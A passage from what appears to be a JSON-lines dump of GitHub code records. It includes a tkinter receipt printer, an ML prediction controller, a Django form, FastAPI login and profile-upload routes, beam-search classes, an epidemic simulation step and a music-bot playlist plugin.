superclass.\n\"\"\"\n\n\n\"\"\"\nclass Worker:\n def __init__(self, name):\n self.name = name\n\n def postion(self):\n print()\n\"\"\"\n\n# Abstraction\n\n\nclass Library(ABC):\n @abstractmethod\n def detail(self):\n pass\n\n\nclass Book(Library):\n def __init__(self, bname, bauthor):\n self.bname = bname\n self.bauthor = bauthor\n\n def detail(self):\n print(f\"Book Title: {self.bname} and author: {self.bauthor}\")\n\n\nb1 = Book(\"Weep Not Child\", \"Mary Vanessa\")\nb1.detail()\n\n\n# --------------------------------Assignment------------------------------------------------\n\"\"\"\n Create a receipt printing program with GUI interface.\n A more advanced detail wins more points.\n\"\"\"\n\n# Create the main window\nroot = tk.Tk()\nroot.title(\"Mary Vanessa Nansumba Receipt 
Printing\")\nroot.geometry(\"600x600\")\n\n# Function to add an item to the list\n\n\ndef add_item():\n item = item_entry.get()\n quantity = quantity_entry.get()\n price = price_entry.get()\n\n if item and quantity and price:\n items_listbox.insert(\n tk.END, f\"{item} - Quantity: {quantity} - Price: ${price}\")\n item_entry.delete(0, tk.END)\n quantity_entry.delete(0, tk.END)\n price_entry.delete(0, tk.END)\n else:\n messagebox.showwarning(\"Missing Information\",\n \"Please enter item details.\")\n\n# Function to remove an item from the list\n\n\ndef remove_item():\n selected_index = items_listbox.curselection()\n if selected_index:\n items_listbox.delete(selected_index)\n\n\n# Function to generate the receipt preview\ndef generate_preview():\n receipt_text = \"\"\n receipt_text += \"Date: \" + get_current_date() + \"\\n\\n\"\n receipt_text += \"Seller:\\n\" + seller_name_entry.get() + \"\\n\" + \\\n seller_address_entry.get(\"1.0\", tk.END) + \"\\n\\n\"\n receipt_text += \"Buyer:\\n\" + buyer_name_entry.get() + \"\\n\" + \\\n buyer_address_entry.get(\"1.0\", tk.END) + \"\\n\\n\"\n receipt_text += \"Items:\\n\"\n\n for i in range(items_listbox.size()):\n receipt_text += items_listbox.get(i) + \"\\n\"\n\n receipt_text += \"\\nSubtotal: $\" + str(get_subtotal()) + \"\\n\"\n receipt_text += \"Tax: $\" + str(get_tax(get_subtotal())) + \"\\n\"\n receipt_text += \"Total: $\" + \\\n str(get_subtotal() + get_tax(get_subtotal()))\n\n preview_dialog = tk.Toplevel(root)\n preview_dialog.title(\"Receipt Preview\")\n\n receipt_preview = tk.Label(\n preview_dialog, text=receipt_text, font=(\"Arial\", 12))\n receipt_preview.pack(padx=20, pady=20)\n\n\n# Function to generate the PDF\ndef generate_pdf():\n file_path = filedialog.asksaveasfilename(\n initialdir=\".\",\n title=\"Save Receipt as PDF\",\n filetypes=[(\"PDF Files\", \"*.pdf\")]\n )\n\n if file_path:\n if not file_path.endswith(\".pdf\"):\n file_path += \".pdf\"\n\n c = FPDF()\n c.add_page()\n c.set_font(\"Arial\", \"B\", 12)\n c.cell(0, 10, \"Receipt\", ln=True, align=\"C\")\n c.ln(10)\n\n receipt_text = \"\"\n receipt_text += \"Date: \" + get_current_date() + \"\\n\\n\"\n receipt_text += \"Seller:\\n\" + seller_name_entry.get() + \"\\n\" + \\\n seller_address_entry.get(\"1.0\", tk.END) + \"\\n\\n\"\n receipt_text += \"Buyer:\\n\" + buyer_name_entry.get() + \"\\n\" + \\\n buyer_address_entry.get(\"1.0\", tk.END) + \"\\n\\n\"\n receipt_text += \"Items:\\n\"\n\n for i in range(items_listbox.size()):\n receipt_text += items_listbox.get(i) + \"\\n\"\n\n receipt_text += \"\\nSubtotal: $\" + str(get_subtotal()) + \"\\n\"\n receipt_text += \"Tax: $\" + str(get_tax(get_subtotal())) + \"\\n\"\n receipt_text += \"Total: $\" + \\\n str(get_subtotal() + get_tax(get_subtotal()))\n\n c.set_font(\"Arial\", \"\", 10)\n c.multi_cell(0, 10, receipt_text)\n\n try:\n c.output(file_path)\n messagebox.showinfo(\n \"PDF Generated\", \"Receipt saved as PDF successfully!\")\n except Exception as e:\n messagebox.showerror(\n \"Error\", f\"An error occurred while saving the PDF: {str(e)}\")\n\n# Helper function to get the current date\n\n\ndef get_current_date():\n import datetime\n return datetime.date.today().strftime(\"%Y-%m-%d\")\n\n# Helper function to calculate the subtotal\n\n\ndef get_subtotal():\n subtotal = 0.0\n for i in range(items_listbox.size()):\n item_info = items_listbox.get(i)\n price_start_index = item_info.rfind(\"$\") + 1\n price = float(item_info[price_start_index:])\n subtotal += price\n return subtotal\n\n# Helper function to calculate the 
tax\n\n\ndef get_tax(amount):\n tax_rate = 0.07\n return amount * tax_rate\n\n\n# Create the seller section\nseller_frame = tk.Frame(root)\nseller_frame.pack(pady=10)\n\nseller_name_label = tk.Label(seller_frame, text=\"Seller Name:\")\nseller_name_label.pack(side=tk.LEFT)\n\nseller_name_entry = tk.Entry(seller_frame)\nseller_name_entry.pack(side=tk.LEFT, padx=10)\n\nseller_address_label = tk.Label(seller_frame, text=\"Seller Address:\")\nseller_address_label.pack(side=tk.LEFT)\n\nseller_address_entry = tk.Text(seller_frame, height=3, width=40)\nseller_address_entry.pack(side=tk.LEFT, padx=10)\n\n# Create the buyer section\nbuyer_frame = tk.Frame(root)\nbuyer_frame.pack(pady=10)\n\nbuyer_name_label = tk.Label(buyer_frame, text=\"Buyer Name:\")\nbuyer_name_label.pack(side=tk.LEFT)\n\nbuyer_name_entry = tk.Entry(buyer_frame)\nbuyer_name_entry.pack(side=tk.LEFT, padx=10)\n\nbuyer_address_label = tk.Label(buyer_frame, text=\"Buyer Address:\")\nbuyer_address_label.pack(side=tk.LEFT)\n\nbuyer_address_entry = tk.Text(buyer_frame, height=3, width=40)\nbuyer_address_entry.pack(side=tk.LEFT, padx=10)\n\n\n# Create the items section\nitems_frame = tk.Frame(root)\nitems_frame.pack(pady=10)\n\nitems_label = tk.Label(items_frame, text=\"Items\")\nitems_label.pack()\n\nitem_frame = tk.Frame(items_frame)\nitem_frame.pack()\n\nitem_label = tk.Label(item_frame, text=\"Item:\")\nitem_label.pack(side=tk.LEFT)\n\nitem_entry = tk.Entry(item_frame)\nitem_entry.pack(side=tk.LEFT, padx=10)\n\nquantity_label = tk.Label(item_frame, text=\"Quantity:\")\nquantity_label.pack(side=tk.LEFT)\n\nquantity_entry = tk.Entry(item_frame, width=10)\nquantity_entry.pack(side=tk.LEFT, padx=10)\n\nprice_label = tk.Label(item_frame, text=\"Price:\")\nprice_label.pack(side=tk.LEFT)\n\nprice_entry = tk.Entry(item_frame, width=10)\nprice_entry.pack(side=tk.LEFT, padx=10)\n\nadd_button = tk.Button(items_frame, text=\"Add Item\", command=add_item)\nadd_button.pack(pady=10)\n\nitems_listbox = tk.Listbox(items_frame, height=10, width=60)\nitems_listbox.pack(pady=10)\n\nremove_button = tk.Button(items_frame, text=\"Remove Item\", command=remove_item)\nremove_button.pack(pady=10)\n\n# Create the receipt preview frame\nreceipt_preview_frame = tk.Frame(root)\nreceipt_preview_frame.pack(pady=10)\n\nreceipt_preview_button = tk.Button(\n receipt_preview_frame, text=\"Preview Receipt\", command=generate_preview)\nreceipt_preview_button.pack(side=tk.LEFT, padx=10)\n\ngenerate_pdf_button = tk.Button(\n receipt_preview_frame, text=\"Generate PDF\", command=generate_pdf)\ngenerate_pdf_button.pack(side=tk.LEFT, padx=10)\n\n# Run the application\nroot.mainloop()\n","repo_name":"mary-nessa/Recess","sub_path":"Mary_vanessa/mary_vanessa_nansumba_morning.py","file_name":"mary_vanessa_nansumba_morning.py","file_ext":"py","file_size_in_byte":9399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42517277394","text":"import json\nimport logging\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom mlp.mlp import MLP\nfrom naive_classifier.naive_classifier import NaiveClassifier\n\n\ndef parse_data(json_input):\n if isinstance(json_input, str):\n parsed = json.loads(json_input)\n else:\n parsed = json.loads(json.dumps(json_input))\n data = pd.DataFrame(parsed)\n\n col_session_id = \"session_id\"\n col_success = \"successful\"\n\n session_id = data[col_session_id]\n success = data[col_success]\n\n return data.drop([col_session_id, col_success], axis=1), session_id, 
success\n\n\ndef create_df(session_id, prediction, success):\n df = pd.DataFrame()\n df[\"session_id\"] = session_id\n df[\"prediction\"] = prediction\n df[\"correct_value\"] = success\n return df\n\n\nclass Controller:\n def __init__(self):\n logging.basicConfig(filename=\"model_compare.log\", level=logging.DEBUG)\n\n data = pd.read_csv(\"../data/data_with_categories.csv\")\n col_to_predict = \"successful\"\n\n y = data[col_to_predict]\n X = data.drop([col_to_predict], axis=1)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=21)\n\n self.__dummy_model = NaiveClassifier(X_train, y_train)\n self.__mlp = MLP(X_train, y_train)\n\n def predict_mlp(self, json_input):\n data_input, session_id, success = parse_data(json_input)\n\n prediction = self.__mlp.mlp_predict(data_input)\n\n df = create_df(session_id, prediction, success)\n\n json_log = df.to_json(orient=\"records\")\n\n logging.info(f\"Model: MLP; {json_log}\")\n\n return {\"model\": \"MLP\", \"predictions\": df.to_dict(orient=\"records\")}\n\n def predict_naive(self, json_input):\n data_input, session_id, success = parse_data(json_input)\n\n prediction = self.__dummy_model.dummy_classifier_predict(data_input)\n\n df = create_df(session_id, prediction, success)\n\n json_log = df.to_json(orient=\"records\")\n\n logging.info(f\"Model: Naive; {json_log}\")\n\n return {\"model\": \"Naive\", \"predictions\": df.to_dict(orient=\"records\")}\n","repo_name":"ilyashich/IUM","sub_path":"app/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73594496108","text":"from django import forms\nfrom .models import Group, Vehicle, Device, Person\nfrom django.contrib.auth.models import User\n\nclass GroupForm(forms.ModelForm):\n # Define choices for the vehicleId field\n vehicle_choices = [(vehicle.id, vehicle.__int__()) for vehicle in Vehicle.objects.all()]\n\n vehicleId = forms.ChoiceField(\n choices=vehicle_choices,\n widget=forms.Select(attrs={'class': 'select2'}),\n )\n\n # Define choices for the deviceId field\n device_choices = [(device.id, device.__int__()) for device in Device.objects.all()]\n\n deviceId = forms.ChoiceField(\n choices=device_choices,\n widget=forms.Select(attrs={'class': 'select2'}),\n )\n\n # Define choices for the personId field\n person_choices = [(person.id, person.__str__()) for person in Person.objects.all()]\n\n personId = forms.ChoiceField(\n choices=person_choices,\n widget=forms.Select(attrs={'class': 'select2'}),\n )\n\n user_choices = [(user.id, user.username) for user in User.objects.all()]\n\n userId = forms.ChoiceField(\n choices=user_choices,\n widget=forms.Select(attrs={'class': 'select2'}),\n )\n \n class Meta:\n model = Group\n fields = ['name', 'vehicleId', 'deviceId', 'personId', 'userId']","repo_name":"HaranK007/Vehicle_Tracking","sub_path":"adminDashboard/froms.py","file_name":"froms.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2020914495","text":"from typing import Any, Optional, Union\n\nimport cloudinary.uploader\nfrom cloudinary.exceptions import Error\nfrom fastapi import APIRouter, Depends, HTTPException, Query, Security, status, File\nfrom fastapi.encoders import jsonable_encoder\nfrom fastapi.security import HTTPAuthorizationCredentials, HTTPBearer\nfrom sqlalchemy.orm import Session\n\nfrom todo.api_v1.config 
import Config\nfrom todo.api_v1.schemas.user_schema import (\n AccessTokenData, UserCreate, User, Credentials, TokenData, UserProfile)\nfrom todo.api_v1.schemas.error_response_schema import ErrorResponse, error_responses\nfrom todo.api_v1.dependencies.database import get_db\nfrom todo.api_v1.database.actions.user_actions import (\n create_user, get_user_by_id, get_user_by_username, set_profile_image, authentication_handler)\n\nrouter = APIRouter(prefix=Config.API_VERSION_STRING, tags=['User'])\nsecurity = HTTPBearer(scheme_name='Bearer')\ncloudinary.config(cloud_name=Config.CLOUDINARY_CLOUD_NAME,\n api_key=Config.CLOUDINARY_CLOUD_API_KEY,\n api_secret=Config.CLOUDINARY_CLOUD_API_SECRET)\n\n\n@router.post('/users', tags=['User'], responses=error_responses)\ndef create_user_route(user: UserCreate,\n db: Session = Depends(get_db)):\n \"\"\"\n API route to create a new user instance\n \"\"\"\n try:\n create_user(db=db, user=user)\n return {'message': 'User created successfully'}\n except Exception as e:\n if isinstance(e, HTTPException):\n raise e\n raise HTTPException(status_code=status.HTTP_500_INTERNAL_SERVER_ERROR, detail=jsonable_encoder(ErrorResponse(\n message='Internal server error', code=status.HTTP_500_INTERNAL_SERVER_ERROR)))\n\n\n@router.post(\"/users/login\", tags=[\"User\"], response_model=Union[TokenData, dict], responses=error_responses)\ndef login_user(credentials: Credentials, db: Session = Depends(get_db)):\n \"\"\"\n API route to login a user\n \"\"\"\n try:\n user = get_user_by_username(db=db, username=credentials.username)\n if not user:\n raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, detail=jsonable_encoder(ErrorResponse(\n message=\"Username not found\", code=status.HTTP_401_UNAUTHORIZED)))\n\n if not authentication_handler.decode_password(credentials.password, user.hashed_password):\n raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, detail=jsonable_encoder(ErrorResponse(\n message=\"Invalid password\", code=status.HTTP_401_UNAUTHORIZED)))\n access_token = authentication_handler.encode_jwt_token(\n username=user.username)\n refresh_token = authentication_handler.encode_jwt_refresh_token(\n username=user.username)\n return {\"access_token\": access_token, \"refresh_token\": refresh_token}\n except Exception as e:\n raise e\n\n\n@router.get('/users/me', response_model=Union[UserProfile, dict], tags=['User'], responses=error_responses)\ndef get_user_profile(credentials: HTTPAuthorizationCredentials = Security(security),\n db: Session = Depends(get_db)):\n \"\"\"\n API route to get a user profile\n \"\"\"\n access_token = credentials.credentials\n username = authentication_handler.decode_jwt_token(access_token)\n try:\n user = get_user_by_username(db=db, username=username)\n return {\"username\": user.username, \"profile_image\": user.profile_image}\n except Exception as e:\n raise e\n\n\n@router.post('/users/me/upload', tags=['User'], responses=error_responses)\ndef upload_profile_image(profile_image: bytes = File(...), credentials: HTTPAuthorizationCredentials = Security(security), db: Session = Depends(get_db)):\n \"\"\"\n API route to upload a profile image\n \"\"\"\n access_token = credentials.credentials\n username = authentication_handler.decode_jwt_token(access_token)\n try:\n user = get_user_by_username(db=db, username=username)\n if user:\n if profile_image is None:\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=jsonable_encoder(\n ErrorResponse(code=status.HTTP_400_BAD_REQUEST, message=\"No file uploaded\")))\n 
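# ---------------------------------------------------------------------------
# Editor's note (hedged addition, not part of the original record): the routes
# above implement a Bearer-token login flow. A minimal client-side sketch of
# that flow follows. The base URL, username and password are hypothetical;
# only the route paths, the Bearer scheme, and the response shapes
# ({"access_token", "refresh_token"} and {"username", "profile_image"}) are
# taken from the handlers in this record. Config.API_VERSION_STRING is not
# shown in the record, so "/api/v1" is an assumption.
import requests

BASE = "http://localhost:8000/api/v1"  # assumed prefix

# Log in and collect the token pair returned by /users/login.
tokens = requests.post(
    f"{BASE}/users/login",
    json={"username": "alice", "password": "secret"},
).json()

# Pass the access token in the Authorization header expected by HTTPBearer.
profile = requests.get(
    f"{BASE}/users/me",
    headers={"Authorization": f"Bearer {tokens['access_token']}"},
)
print(profile.json())  # {"username": ..., "profile_image": ...}
# ---------------------------------------------------------------------------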
profile_image = cloudinary.uploader.upload(profile_image, allowed_formats=[\n 'png', 'jpg', 'jpeg'], public_id=user.username)\n profile_image_url = profile_image[\"secure_url\"]\n print(profile_image_url)\n set_profile_image(db=db, user=user,\n image_url=profile_image_url)\n return {\"message\": \"Profile image uploaded successfully\",\n \"url\": profile_image_url}\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=jsonable_encoder(\n ErrorResponse(code=status.HTTP_404_NOT_FOUND, message=\"User not found\")))\n except Exception as e:\n if isinstance(e, Error):\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=jsonable_encoder(\n ErrorResponse(code=status.HTTP_400_BAD_REQUEST, message=e.args[0])))\n raise e\n\n\n@ router.get(\"/users/refresh\", tags=[\"User\"], response_model=Union[AccessTokenData, Any], responses=error_responses)\ndef refresh_token(credentials: HTTPAuthorizationCredentials = Security(security)):\n try:\n refresh_token = credentials.credentials\n new_jwt_token = authentication_handler.refresh_jwt_token(refresh_token)\n return {\"access_token\": new_jwt_token}\n except Exception as e:\n raise e\n\n\n@ router.get('/users', response_model=User, tags=['User'])\ndef get_user_route(user_id: Optional[int] = Query(None, alias=\"id\"),\n username: Optional[str] = Query(\n None, alias=\"username\", max_length=10),\n db: Session = Depends(get_db)):\n \"\"\"\n API route to get a user instance by id or by username\n \"\"\"\n try:\n if user_id:\n return get_user_by_id(db=db, user_id=user_id)\n if username:\n return get_user_by_username(db=db, username=username)\n except Exception:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=jsonable_encoder(ErrorResponse(\n message=\"User not found\", code=status.HTTP_404_NOT_FOUND)))\n","repo_name":"KrazyKahunaGuy/todo-app-backend","sub_path":"todo/api_v1/routers/user_router.py","file_name":"user_router.py","file_ext":"py","file_size_in_byte":6283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22556014128","text":"import random\n\nTQDM_MODE = True\n\n\nclass BeamSearchSolution:\n def __init__(\n self,\n windows,\n max_cost,\n B,\n diversity_policy,\n init_cost,\n init_score,\n init_overlap_index,\n ):\n self.windows = windows\n if not init_score:\n self.score = sum([w.score for w in windows])\n else:\n self.score = init_score\n if not init_cost:\n self.cost = sum([w.cost for w in windows])\n else:\n self.cost = init_cost\n self.overlap_index = init_overlap_index\n self.max_cost = max_cost\n self.lock = False\n self.B = B\n self.diversity_policy = diversity_policy\n\n def add_window(self, new_window, train_set):\n if self.cost >= self.max_cost:\n self.lock = True\n return self\n init_cost = self.cost + new_window.cost\n init_score = self.score + new_window.score\n init_overlap_index = self.overlap_index.copy()\n if new_window.i in init_overlap_index:\n init_overlap_index[new_window.i] = init_overlap_index[new_window.i].union(\n new_window.get_index_set()\n ) # Need to generalise this\n else:\n init_overlap_index[new_window.i] = new_window.get_index_set()\n # new_ngram = train_set.data_from_window(new_window)\n\n return self.__class__(\n self.windows + [new_window],\n self.max_cost,\n self.B,\n init_cost=init_cost,\n init_score=init_score,\n init_overlap_index=init_overlap_index,\n diversity_policy=self.diversity_policy,\n )\n\n def is_permutationally_distinct(self, other):\n # We do a proxy-check for permutation invariance by 
checking for score and cost of solutions\n if abs(self.score - other.score) < 1e-6 and self.cost == other.cost:\n return False\n else:\n return True\n\n def all_permutationally_distinct(self, others):\n for other_solution in others:\n if not self.is_permutationally_distinct(other_solution):\n return False\n else:\n return True\n\n def new_window_unlabelled(self, new_window):\n if new_window.i not in self.overlap_index:\n self.overlap_index[new_window.i] = set() # Just in case!\n return True\n else:\n new_word_idx = new_window.get_index_set()\n if self.overlap_index[new_window.i].intersection(new_word_idx):\n return False\n else:\n return True\n\n def new_window_viable(self, new_window):\n if not self.new_window_unlabelled(new_window):\n return False\n if self.diversity_policy.new_window_viable(new_window, self):\n return True\n else:\n return False\n\n def branch_out(self, other_solutions, window_scores, usable_mask, train_set):\n raise NotImplementedError\n\n\nclass GreedyBeamSearchSolution(BeamSearchSolution):\n\n def __init__(\n self,\n windows,\n max_cost,\n B,\n diversity_policy,\n init_cost,\n init_score,\n init_overlap_index,\n *args\n ):\n super(GreedyBeamSearchSolution, self).__init__(\n windows,\n max_cost,\n B,\n diversity_policy,\n init_cost,\n init_score,\n init_overlap_index,\n )\n\n def ep_check(self):\n return False\n\n def choose_window_uniformly(self, window_scores, usable_mask, train_set):\n raise NotImplementedError\n\n def branch_out(self, other_solutions, window_scores, usable_mask, train_set):\n # ASSUME window_scores ALREADY SORTED\n local_branch = []\n for j, window in enumerate(window_scores):\n if not usable_mask[j]:\n continue\n if self.ep_check():\n possible_node, usable_mask = self.choose_window_uniformly(window_scores, usable_mask, train_set)\n local_branch.append(possible_node)\n if len(local_branch) == self.B:\n return local_branch, usable_mask\n if self.new_window_viable(window):\n possible_node = self.add_window(window, train_set)\n # Permutation check unused if we are using usable_mask - this might want to be parameterised in the\n # future. 
You can use j here to change things up\n # if possible_node.all_permutationally_distinct(other_solutions):\n local_branch.append(possible_node)\n usable_mask[j] = 0\n if len(local_branch) == self.B:\n return local_branch, usable_mask\n if self.lock:\n return [self], usable_mask\n\n # No more windows addable\n if len(local_branch) == 0:\n self.lock = True\n return [self], usable_mask\n else:\n return local_branch, usable_mask\n\n\nclass EpsilonGreedyBeamSearchSolution(GreedyBeamSearchSolution):\n\n def __init__(\n self,\n windows,\n max_cost,\n B,\n diversity_policy,\n init_cost,\n init_score,\n init_overlap_index,\n epsilon\n ):\n super(EpsilonGreedyBeamSearchSolution, self).__init__(\n windows,\n max_cost,\n B,\n diversity_policy,\n init_cost,\n init_score,\n init_overlap_index,\n )\n self.epsilon = epsilon\n\n def ep_check(self):\n return random.uniform(0, 1) str:\n return self.ID\n\n def result_id(self, p: Parameters) -> str:\n return p.sha1_hash()\n\n def run(self, p: Parameters) -> ModelResult:\n\n # run multiple steps of the simulation\n for i in range(p.number_of_steps):\n self.step(p, i)\n\n # placeholders for the report\n standard_sol = [{'t': range(p.number_of_steps)}]\n perc = [0] * p.number_of_steps\n percentiles = [perc, perc, perc, perc, perc]\n config_dict = []\n [config_dict.append(\n dict(\n beta=0,\n latentRate=0,\n removalRate=0,\n hospRate=0,\n deathRateICU=0,\n deathRateNoIcu=0\n )) for _ in range(p.number_of_steps)]\n\n report_raw = [[0]]\n prevalence_age = pd.DataFrame([[0]])\n prevalence_all = pd.DataFrame([[0]])\n cumulative_all = pd.DataFrame([[0]])\n cumulative_age = pd.DataFrame([[0]])\n\n states = ['exposed_tl', 'presymptomatic_tl', 'symptomatic_tl', 'mild_tl', 'severe_tl', 'recovered_tl',\n 'qua_susceptible_tl', 'qua_exposed_tl', 'qua_presymptomatic_tl', 'qua_symptomatic_tl', 'qua_mild_tl',\n 'qua_severe_tl', 'qua_recovered_tl']\n # disease_state_tracker_plot = go.Figure()\n\n mr = ModelResult(self.result_id(p), {\n 'standard_sol': standard_sol,\n 'percentiles': percentiles,\n 'config_dict': config_dict,\n 'params': p,\n 'report': report_raw,\n 'track_states_df': p.track_states,\n 'multiple_categories_to_plot': states,\n 'prevalence_all': prevalence_all,\n 'cumulative_all': cumulative_all,\n 'cumulative_age': cumulative_age\n })\n\n # at end of simulation, return model result\n return mr\n\n @staticmethod\n def step(p: Parameters, t):\n \"\"\"\n Execute abm simulation step\n\n Parameters\n ----------\n p: `Parameters` object for simulation\n t: Step number\n\n Returns\n -------\n None\n\n \"\"\"\n p.track_states[t, :] = np.bincount(p.population[:, 1].astype(int), minlength=14)\n\n # finish simulation by checking states\n # TODO: currently, if all people are either susceptible/recovered then we finish simulation\n # TODO: should it not include qua_susceptible/qua_recovered states as well?\n if abm.epidemic_finish(np.concatenate((p.track_states[t, 1:6], p.track_states[t, 7:p.number_of_states])), t):\n return\n\n # The probability that a person's disease state will change from mild->recovered (0.37)\n # Liu et al 2020 The Lancet.\n p.mild_rec = np.random.uniform(0, 1, p.total_population) > math.exp(0.2 * math.log(0.1))\n\n # The probability that a person's disease state will change from severe->recovered (0.071)\n # Cai et al.\n p.sev_rec = np.random.uniform(0, 1, p.total_population) > math.exp(math.log(63 / 153) / 12)\n\n # Get random numbers to determine health states\n p.pick_sick = np.random.uniform(0, 1, p.total_population)\n\n if p.ACTIVATE_INTERVENTION and 
t != 0:\n p.iat1 = t\n p.ACTIVATE_INTERVENTION = False\n p.smaller_movement_radius = 0.001\n p.transmission_reduction = 0.25 # TODO: why is this here?\n p.foodpoints_location, p.foodpoints_numbers, p.foodpoints_sharing = abm.position_foodline(\n p.households_location, p.foodline_blocks[0], p.foodline_blocks[1])\n p.local_interaction_space = abm.interaction_neighbours_fast(p.households_location,\n p.smaller_movement_radius,\n p.larger_movement_radius,\n p.overlapping_rages_radius,\n p.ethnical_corellations)\n p.viol_rate = 0.05\n p.population[:, 8] = np.where(np.random.rand(p.total_population) < p.viol_rate, 1, 0)\n\n # increase day count for all non-susceptible people\n # TODO: should we exclude qua_susceptible (index=7) as well here along with susceptible (index=0) ?\n p.population[np.where(p.population[:, 1] > 0), 3] += 1\n\n # update disease states of people not in quarantine\n # also update the population matrix and total hospitalized count\n p.population, p.total_number_of_hospitalized = abm.disease_state_update(\n p.population,\n p.mild_rec,\n p.sev_rec,\n p.pick_sick,\n p.total_number_of_hospitalized\n )\n\n # update disease states of people in quarantine\n # also update the population matrix and total hospitalized count\n p.population, p.total_number_of_hospitalized = abm.disease_state_update(\n p.population,\n p.mild_rec,\n p.sev_rec,\n p.pick_sick,\n p.total_number_of_hospitalized,\n quarantined=True\n )\n\n p.population = abm.assign_new_infections(p.population,\n p.toilets_sharing,\n p.foodpoints_sharing,\n p.num_toilet_visit,\n p.num_toilet_contact,\n p.num_food_visit,\n p.num_food_contact,\n p.pct_food_visit,\n p.transmission_reduction,\n p.local_interaction_space,\n p.probability_infecting_person_in_household_per_day,\n p.probability_infecting_person_in_foodline_per_day,\n p.probability_infecting_person_in_toilet_per_day,\n p.probability_infecting_person_in_moving_per_day)\n\n p.population = abm.move_hhl_quarantine(p.population, p.probability_spotting_symptoms_per_day)\n\n p.quarantine_back = np.logical_and(p.population[:, 1] == 13, p.population[:, 3] >= p.clearday)\n p.population[p.quarantine_back, 1] = 6\n","repo_name":"Ben-McIlveen/model-server","sub_path":"ai4good/models/abm/abm_model.py","file_name":"abm_model.py","file_ext":"py","file_size_in_byte":7037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"43368102812","text":"from typing import Any, List, Optional, cast\n\nfrom ..config import config\nfrom ..data_source import (\n get_offset_by_page_num,\n get_playlist_info,\n get_track_info,\n search_playlist,\n)\nfrom ..draw import Table, TableHead, TablePage\nfrom ..types import Playlist as PlaylistModel\nfrom ..types import PlaylistFromSearch, PlaylistSearchResult, SongSearchResult\nfrom ..types import Song as SongModel\nfrom .base import BasePlaylist, BaseSearcher, playlist, searcher\nfrom .song import Song, SongSearcher\n\nCALLING = \"歌单\"\nCHILD_CALLING = Song.calling\nCOMMANDS = [\"歌单\", \"playlist\"]\nLINK_TYPES = [\"playlist\"]\n\n\n@playlist\nclass Playlist(BasePlaylist[PlaylistModel, SongModel, Song]):\n calling = CALLING\n child_calling = CHILD_CALLING\n link_types = LINK_TYPES\n\n info: PlaylistModel\n\n @property\n def playlist_id(self) -> int:\n return self.info.id\n\n def __init__(self, info: PlaylistModel, *args, **kwargs) -> None:\n self.info = info\n super().__init__(*args, **kwargs)\n\n def __repr__(self) -> str:\n return f\"{self.__class__.__name__}(playlist_id={self.playlist_id})\"\n\n @classmethod\n 
async def from_id(cls, arg_id: int) -> \"Playlist\":\n resp = await get_playlist_info(arg_id)\n return cls(resp)\n\n async def _build_list_resp(self, resp: PlaylistModel, page: int) -> TablePage:\n if not resp.tracks:\n raise ValueError(\"Playlist is empty\")\n fake_song_search_resp = SongSearchResult(\n searchQcReminder=None,\n songCount=resp.trackCount,\n songs=resp.tracks,\n )\n return await SongSearcher._build_list_resp( # noqa: SLF001\n cast(Any, self),\n fake_song_search_resp,\n page,\n )\n\n async def _extract_resp_content(\n self,\n resp: PlaylistModel,\n ) -> List[SongModel]:\n return resp.tracks\n\n async def _do_get_page(self, page: int) -> PlaylistModel:\n offset = get_offset_by_page_num(page)\n track_ids = [\n x.id for x in self.info.trackIds[offset : offset + config.ncm_list_limit]\n ]\n tracks = await get_track_info(track_ids)\n kwargs = {**self.info.dict(by_alias=True), \"tracks\": tracks}\n return PlaylistModel(**kwargs)\n\n async def _build_selection(self, resp: SongModel) -> Song:\n return Song(info=resp)\n\n\n@searcher\nclass PlaylistSearcher(\n BaseSearcher[PlaylistSearchResult, PlaylistFromSearch, Playlist],\n):\n calling = CALLING\n commands = COMMANDS\n\n @classmethod\n async def from_id(cls, arg_id: int) -> Optional[Playlist]:\n try:\n return await Playlist.from_id(arg_id)\n except ValueError:\n return None\n\n async def _build_list_resp(\n self,\n resp: PlaylistSearchResult,\n page: int,\n ) -> TablePage:\n if not resp.playlists:\n raise ValueError(\"No song in raw response\")\n table = Table(\n [\n TableHead(\"序号\", align=\"right\"),\n TableHead(\"歌单名\", max_width=config.ncm_max_name_len),\n TableHead(\"创建者\", max_width=config.ncm_max_artist_len),\n TableHead(\"歌曲数\", align=\"center\"),\n TableHead(\"播放数\", align=\"center\"),\n TableHead(\"收藏数\", align=\"center\"),\n ],\n [\n [\n f\"[b]{i}[/b]\",\n x.name,\n x.creator.nickname,\n f\"{x.trackCount}\",\n f\"{x.playCount}\",\n f\"{x.bookCount}\",\n ]\n for i, x in enumerate(resp.playlists, self._calc_index_offset(page))\n ],\n )\n return TablePage(table, self.child_calling, page, resp.playlistCount)\n\n async def _extract_resp_content(\n self,\n resp: PlaylistSearchResult,\n ) -> Optional[List[PlaylistFromSearch]]:\n return resp.playlists\n\n async def _do_get_page(self, page: int) -> PlaylistSearchResult:\n return await search_playlist(self.keyword, page=page)\n\n async def _build_selection(self, resp: PlaylistFromSearch) -> Playlist:\n return await Playlist.from_id(resp.id)\n","repo_name":"lgc-NB2Dev/nonebot-plugin-multincm","sub_path":"nonebot_plugin_multincm/providers/playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"20345931555","text":"#! /usr/bin/env python\n\n\"\"\"run and initiate nltk.download('all') \"\"\"\n\nimport nltk\n\n# setup or argparse\n\nPERMISSION = input(\"Would you like to continue and install all nltk dependanies? 
